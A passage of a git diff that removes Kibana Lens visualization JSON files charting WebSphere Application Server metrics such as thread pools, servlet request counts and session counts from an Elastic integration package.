/dev/null @@ -1,142 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "1decd051-dbf6-4a80-aa20-85278fedc2d4": { - "columnOrder": [ - "33936c70-d53c-4ccd-ba8d-f833c3b9dc3e", - "cce82f91-3637-4406-8633-bcd5bfe8a984", - "2b1baf93-2b7f-430d-9048-f11cb2bfb65e" - ], - "columns": { - "2b1baf93-2b7f-430d-9048-f11cb2bfb65e": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.active: *" - }, - "isBucketed": false, - "label": "Active Threads", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.threads.active" - }, - "33936c70-d53c-4ccd-ba8d-f833c3b9dc3e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "cce82f91-3637-4406-8633-bcd5bfe8a984": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.threadpool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "2b1baf93-2b7f-430d-9048-f11cb2bfb65e", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.threadpool.name" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.active : * " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "2b1baf93-2b7f-430d-9048-f11cb2bfb65e" - ], - "layerId": "1decd051-dbf6-4a80-aa20-85278fedc2d4", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "cce82f91-3637-4406-8633-bcd5bfe8a984", - "xAccessor": "33936c70-d53c-4ccd-ba8d-f833c3b9dc3e" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Active Threads [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-86426870-baec-11ec-b244-51e5cddeab04", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-1decd051-dbf6-4a80-aa20-85278fedc2d4", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-888801c0-bae3-11ec-b244-51e5cddeab04.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-888801c0-bae3-11ec-b244-51e5cddeab04.json deleted file mode 100644 index 3a8e6a62013..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-888801c0-bae3-11ec-b244-51e5cddeab04.json +++ /dev/null @@ -1,161 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5c2223d3-b3ba-45a2-848f-2a5e4ab9264c": { - "columnOrder": [ - "ea4d6628-e862-4e42-a8f3-59572a45894e", - "c4d4248d-67c1-454c-bea0-cfc45f7d43f9", - "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", - "b093e53a-a7e7-4b74-af63-b3da68cf3989" - ], - "columns": { - "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.threadpool.total.created: *" - }, - "isBucketed": false, - "label": "Threads Created", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.total.created" - }, - "b093e53a-a7e7-4b74-af63-b3da68cf3989": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.threadpool.total.destroyed: *" - }, - "isBucketed": false, - "label": "Threads Destroyed", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.total.destroyed" - }, - "c4d4248d-67c1-454c-bea0-cfc45f7d43f9": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.threadpool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.threadpool.name" - }, - "ea4d6628-e862-4e42-a8f3-59572a45894e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.threadpool.total.created : * or websphere_application_server.threadpool.total.destroyed : * " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", - "b093e53a-a7e7-4b74-af63-b3da68cf3989" - ], - "layerId": "5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "c4d4248d-67c1-454c-bea0-cfc45f7d43f9", - "xAccessor": "ea4d6628-e862-4e42-a8f3-59572a45894e" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Thread Count" - } - }, - "title": "Number of Threads Created and Destroyed [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-888801c0-bae3-11ec-b244-51e5cddeab04", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-8ce6ed80-b59d-11ec-888d-b1230de080fd.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-8ce6ed80-b59d-11ec-888d-b1230de080fd.json deleted file mode 100644 index a6723809043..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-8ce6ed80-b59d-11ec-888d-b1230de080fd.json +++ /dev/null @@ -1,178 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "6bff5182-8367-4e11-8b9a-69bfe903149c": { - "columnOrder": [ - "e5379b96-4137-4122-ae12-4043ff5f1d83", - "1b761837-dde2-418e-b754-b51432eaf95a", - "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1", - "302ef164-d49c-4a57-9a96-888917e2c880", - "302ef164-d49c-4a57-9a96-888917e2c880X0" - ], - "columns": { - "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.servlet.requests.processed: *" - }, - "isBucketed": false, - "label": "Requests Processed", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.servlet.requests.processed" - }, - "1b761837-dde2-418e-b754-b51432eaf95a": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of App name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.servlet.app_name" - }, - "302ef164-d49c-4a57-9a96-888917e2c880": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Responses Processed", - "operationType": "formula", - "params": { - "formula": "last_value(websphere_application_server.servlet.responses.processed)", - "isFormulaBroken": false - }, - "references": [ - "302ef164-d49c-4a57-9a96-888917e2c880X0" - ], - "scale": "ratio" - }, - "302ef164-d49c-4a57-9a96-888917e2c880X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.servlet.responses.processed: *" - }, - "isBucketed": false, - "label": "Part of Responses Processed", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.servlet.responses.processed" - }, - "e5379b96-4137-4122-ae12-4043ff5f1d83": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.servlet.requests.processed \u003e 0 or websphere_application_server.servlet.responses.processed \u003e 0" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1", - "302ef164-d49c-4a57-9a96-888917e2c880" - ], - "layerId": "6bff5182-8367-4e11-8b9a-69bfe903149c", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "1b761837-dde2-418e-b754-b51432eaf95a", - "xAccessor": "e5379b96-4137-4122-ae12-4043ff5f1d83" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": false, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Count" - } - }, - "title": "Number of Processed Requests and Responses [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-8ce6ed80-b59d-11ec-888d-b1230de080fd", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-6bff5182-8367-4e11-8b9a-69bfe903149c", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-b8c2dff0-baec-11ec-b244-51e5cddeab04.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-b8c2dff0-baec-11ec-b244-51e5cddeab04.json deleted file mode 100644 index b43bcf48694..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-b8c2dff0-baec-11ec-b244-51e5cddeab04.json +++ /dev/null @@ -1,142 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "8d78bbff-634f-4aff-9c25-d3f211b564eb": { - "columnOrder": [ - "665bf1e7-c3ab-45f6-acf3-05ed8ac3001d", - "55c60233-3c4c-4db2-b414-dc40ada3b503", - "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270" - ], - "columns": { - "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.total: *" - }, - "isBucketed": false, - "label": "Total Threads", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.threads.total" - }, - "55c60233-3c4c-4db2-b414-dc40ada3b503": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.threadpool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.threadpool.name" - }, - "665bf1e7-c3ab-45f6-acf3-05ed8ac3001d": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.total : * " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270" - ], - "layerId": "8d78bbff-634f-4aff-9c25-d3f211b564eb", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "55c60233-3c4c-4db2-b414-dc40ada3b503", - "xAccessor": "665bf1e7-c3ab-45f6-acf3-05ed8ac3001d" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Total Threads[Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-b8c2dff0-baec-11ec-b244-51e5cddeab04", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8d78bbff-634f-4aff-9c25-d3f211b564eb", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-d2cf3ac0-baeb-11ec-b244-51e5cddeab04.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-d2cf3ac0-baeb-11ec-b244-51e5cddeab04.json deleted file mode 100644 index 9f1db850fc4..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-d2cf3ac0-baeb-11ec-b244-51e5cddeab04.json +++ /dev/null @@ -1,127 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "407fa94b-9ce9-4ac2-9ca6-1c43dea9bbd0": { - "columnOrder": [ - "2f965609-8b37-4e4d-9e83-20ef0901e869", - "6bd7c586-e630-4880-adb8-d82a050bda0c", - "83043110-a317-4821-8372-79219d3eae1e" - ], - "columns": { - "2f965609-8b37-4e4d-9e83-20ef0901e869": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Server Address", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "83043110-a317-4821-8372-79219d3eae1e", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "server.address" - }, - "6bd7c586-e630-4880-adb8-d82a050bda0c": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "ThreadPool Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "83043110-a317-4821-8372-79219d3eae1e", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.threadpool.name" - }, - "83043110-a317-4821-8372-79219d3eae1e": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.total: *" - }, - "isBucketed": false, - "label": "Total Threads", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.threads.total" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.total : * " - }, - "visualization": { - "columns": [ - { - "columnId": "2f965609-8b37-4e4d-9e83-20ef0901e869", - "isTransposed": false - }, - { - "columnId": "6bd7c586-e630-4880-adb8-d82a050bda0c", - "isTransposed": false - }, - { - "columnId": "83043110-a317-4821-8372-79219d3eae1e", - "isTransposed": false - } - ], - "layerId": "407fa94b-9ce9-4ac2-9ca6-1c43dea9bbd0", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1, - "sorting": { - "columnId": "83043110-a317-4821-8372-79219d3eae1e", - "direction": "desc" - } - } - }, - "title": "Total Threads in Thread Pool [Metrics WebSphere Application Server]", - "visualizationType": "lnsDatatable" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-d2cf3ac0-baeb-11ec-b244-51e5cddeab04", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-407fa94b-9ce9-4ac2-9ca6-1c43dea9bbd0", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-e6d7d480-b59d-11ec-888d-b1230de080fd.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-e6d7d480-b59d-11ec-888d-b1230de080fd.json deleted file mode 100644 index 795411c54e6..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-e6d7d480-b59d-11ec-888d-b1230de080fd.json +++ /dev/null @@ -1,161 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "96a84b63-1fad-48c6-b0de-179dcbfcd741": { - "columnOrder": [ - "2760f523-a7b0-4dd9-adff-5743a44190f4", - "72a036b6-01af-4812-9bcf-f43429e39eb7", - "990fce2d-1026-4d37-85ed-088d392b41f9", - "d2e271e9-cc11-46df-aae0-121042e38bfa" - ], - "columns": { - "2760f523-a7b0-4dd9-adff-5743a44190f4": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "72a036b6-01af-4812-9bcf-f43429e39eb7": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.servlet.app_name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "990fce2d-1026-4d37-85ed-088d392b41f9", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.servlet.app_name" - }, - "990fce2d-1026-4d37-85ed-088d392b41f9": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.servlet.loaded: *" - }, - "isBucketed": false, - "label": "Loaded Servlets", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.servlet.loaded" - }, - "d2e271e9-cc11-46df-aae0-121042e38bfa": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.servlet.reloaded: *" - }, - "isBucketed": false, - "label": "Reloaded Servlets", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.servlet.reloaded" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.servlet.loaded \u003e 0 or websphere_application_server.servlet.reloaded \u003e 0" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "990fce2d-1026-4d37-85ed-088d392b41f9", - "d2e271e9-cc11-46df-aae0-121042e38bfa" - ], - "layerId": "96a84b63-1fad-48c6-b0de-179dcbfcd741", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "72a036b6-01af-4812-9bcf-f43429e39eb7", - "xAccessor": "2760f523-a7b0-4dd9-adff-5743a44190f4" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Count" - } - }, - "title": "Number of Loaded and Reloaded Servlets [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-e6d7d480-b59d-11ec-888d-b1230de080fd", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-96a84b63-1fad-48c6-b0de-179dcbfcd741", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-eab8b780-c07a-11ec-8552-f3dc1a6b95f9.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-eab8b780-c07a-11ec-8552-f3dc1a6b95f9.json deleted file mode 100644 index b415d333b15..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-eab8b780-c07a-11ec-8552-f3dc1a6b95f9.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c": { - "columnOrder": [ - "b0fcb1bb-3640-4710-bb39-4e7ac9985961" - ], - "columns": { - "b0fcb1bb-3640-4710-bb39-4e7ac9985961": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Active Sessions", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.session_manager.sessions.active" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "bb425378-17d3-46b5-aab3-d274bdd9f097", - "key": "websphere_application_server.session_manager.sessions.active", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "websphere_application_server.session_manager.sessions.active" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "b0fcb1bb-3640-4710-bb39-4e7ac9985961", - "layerId": "0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Active sessions [Metrics WebSphere Application Server]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-eab8b780-c07a-11ec-8552-f3dc1a6b95f9", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "bb425378-17d3-46b5-aab3-d274bdd9f097", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-ee7e7210-c07a-11ec-8552-f3dc1a6b95f9.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-ee7e7210-c07a-11ec-8552-f3dc1a6b95f9.json deleted file mode 100644 index 075e47c9223..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-ee7e7210-c07a-11ec-8552-f3dc1a6b95f9.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c": { - "columnOrder": [ - "b0fcb1bb-3640-4710-bb39-4e7ac9985961" - ], - "columns": { - "b0fcb1bb-3640-4710-bb39-4e7ac9985961": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Created Sessions", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.session_manager.sessions.created" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "10b45b12-77b4-4241-a864-55c5b313cd40", - "key": "websphere_application_server.session_manager.sessions.created", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "websphere_application_server.session_manager.sessions.created" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "b0fcb1bb-3640-4710-bb39-4e7ac9985961", - "layerId": "0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Created sessions [Metrics WebSphere Application Server]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-ee7e7210-c07a-11ec-8552-f3dc1a6b95f9", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "10b45b12-77b4-4241-a864-55c5b313cd40", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-f28f6670-c07a-11ec-8552-f3dc1a6b95f9.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-f28f6670-c07a-11ec-8552-f3dc1a6b95f9.json deleted file mode 100644 index 6d9e8a6ae6f..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-f28f6670-c07a-11ec-8552-f3dc1a6b95f9.json +++ /dev/null @@ -1,97 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "0eac0fd6-b8fc-4080-a3e6-3915b79b0fed": { - "columnOrder": [ - "2be98fc5-9e15-4e81-8ba1-f4cbc6f2c06a" - ], - "columns": { - "2be98fc5-9e15-4e81-8ba1-f4cbc6f2c06a": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Invalidated sessions by Timeouts", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.session_manager.sessions.invalidated.by_timeouts" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "4a163dcc-72d4-4fa7-a5e0-32e5fc5284ec", - "key": "websphere_application_server.session_manager.sessions.invalidated.by_timeouts", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "websphere_application_server.session_manager.sessions.invalidated.by_timeouts" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "2be98fc5-9e15-4e81-8ba1-f4cbc6f2c06a", - "layerId": "0eac0fd6-b8fc-4080-a3e6-3915b79b0fed", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Invalidated sessions by Timeouts [Metrics WebSphere Application Server]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-f28f6670-c07a-11ec-8552-f3dc1a6b95f9", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0eac0fd6-b8fc-4080-a3e6-3915b79b0fed", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "4a163dcc-72d4-4fa7-a5e0-32e5fc5284ec", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/manifest.yml b/packages/websphere_application_server/manifest.yml index cd2613a58a6..cd1cc3ec1c4 